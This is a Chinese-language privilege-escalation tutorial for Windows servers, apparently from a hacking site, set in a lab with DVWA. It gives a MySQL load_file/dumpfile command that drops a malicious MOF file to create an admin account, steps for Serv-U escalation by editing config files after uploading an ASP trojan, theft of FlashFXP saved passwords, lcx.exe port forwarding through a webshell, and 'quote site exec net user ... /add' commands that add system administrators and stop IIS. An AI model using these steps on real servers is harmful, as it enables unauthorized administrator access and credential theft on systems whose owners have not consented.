一、MOF漏洞提權(quán)

當(dāng)可以遠(yuǎn)程連接時(shí)，利用工具提權(quán)，新建用戶后，不會(huì)馬上出現(xiàn)，稍等幾十秒后就出現(xiàn)新建的用戶。

當(dāng)不能遠(yuǎn)程連接時(shí)，或不想開啟遠(yuǎn)程連接時(shí)，我們找一個(gè)可寫目錄，上傳一個(gè)mof?的文件

首先將文件上傳在wmpub文件中

上傳

然后進(jìn)入數(shù)據(jù)庫(kù)管理，打開dvwa數(shù)據(jù)庫(kù)，

進(jìn)入數(shù)據(jù)庫(kù)管理

執(zhí)行下面這段命令
select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';

執(zhí)行命令

執(zhí)行后，等待一段時(shí)間，查看是否新建了用戶admin

新建admin用戶

注意新建的帳號(hào)每隔5分鐘就會(huì)新建帳號(hào)，刪除帳號(hào)的辦法參考下面這個(gè)連接地址。

http://www.myhack58.com/Article/html/3/8/2013/38264.htm

二、Mssql提權(quán)

mssql提權(quán)主要分為弱口令與溢出兩類提權(quán)。目前主要通過(guò)弱口令連接直接提權(quán)，溢出類Mssql數(shù)據(jù)庫(kù)幾乎很少見。

這個(gè)數(shù)據(jù)庫(kù)默認(rèn)是可以遠(yuǎn)程鏈接的，可以直接用工具連接

三、serv-u本地提權(quán)及帶配置文件修改提權(quán)

安裝serv_u

暫時(shí)不要啟用

把勾取了

安裝補(bǔ)丁，將補(bǔ)丁放在安裝目錄

漢化，因?yàn)檫@是收費(fèi)的，英文版，我們這是破解版，也是安裝在之前的目錄

然后上傳一個(gè)asp木馬，放在搭建的asp網(wǎng)站

1、通過(guò)修改配置文件提權(quán)

首先找配置文件

修改配置文件，最后提交，成功添加一個(gè)新用戶，有權(quán)限的系統(tǒng)管理員

修改文件

找到安裝目錄，將文件添加一個(gè)有修改權(quán)限

成功

成功添加系統(tǒng)管理員

成功

密碼用cmd5解密，=后面兩位不用管，直接解密后面就ok

密碼cmd5解密

成功添加用戶后，我們可以通過(guò)工具FlashFXP進(jìn)行連接

也可以用cmd.exe連接

cmd.exe連接

2、無(wú)修改配置文件權(quán)限提權(quán)

使用大馬的servu提權(quán)

3、FlashFXP獲取賬號(hào)密碼

下載quick.dat、sites.dat、stats.dat這三個(gè)文件進(jìn)行本地替換，然后用星號(hào)查看器查看，就可以獲取登錄密碼

四、Gene6

安裝時(shí)除了安全、拒絕，其它權(quán)限全給。

?? Gene6 FTP默認(rèn)安裝路徑是C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini其中Remote.ini是主配置文件，管理員登錄的ip、端口和密碼都存儲(chǔ)在這。但Gene6管理員帳號(hào)只充許本地登錄。對(duì)于滲透測(cè)試人員來(lái)講只需要通過(guò)Webshell轉(zhuǎn)發(fā)端口就可以進(jìn)行遠(yuǎn)程連接。

通過(guò)webshell上傳lcx.exe 把端口轉(zhuǎn)發(fā)，如：lcx.exe –tran600127.0.0.1 8021? 接通過(guò)另外一臺(tái)機(jī)器安裝一個(gè)gene6遠(yuǎn)程連接600端口創(chuàng)建一個(gè)域再創(chuàng)建一個(gè)有權(quán)限的帳號(hào),注意Gene6可單獨(dú)定義SITE命令調(diào)用執(zhí)行文件，通過(guò)quote site exec 執(zhí)行就行

命令：

在獲得服務(wù)器FTP管理員后可以用quote site exec命令來(lái)添加系統(tǒng)管理員,cmd下操作方法如下:

quote site exec net user 用戶名 密碼 /add 添加一個(gè)用戶

quote site exec net localhost administrators 用戶名 /add 把用戶添加到系統(tǒng)管理員組

quote site exec tskill PID 在 Windows 2003 中通過(guò) PID 關(guān)閉進(jìn)程

quote site exec tskill notepad 在 Windows 2003 中通過(guò)名稱關(guān)閉同類的進(jìn)程

quote site exec net stop iisadmin 停止 iis 服務(wù)

quote site exec net start iisadmin 啟動(dòng) iis 服務(wù)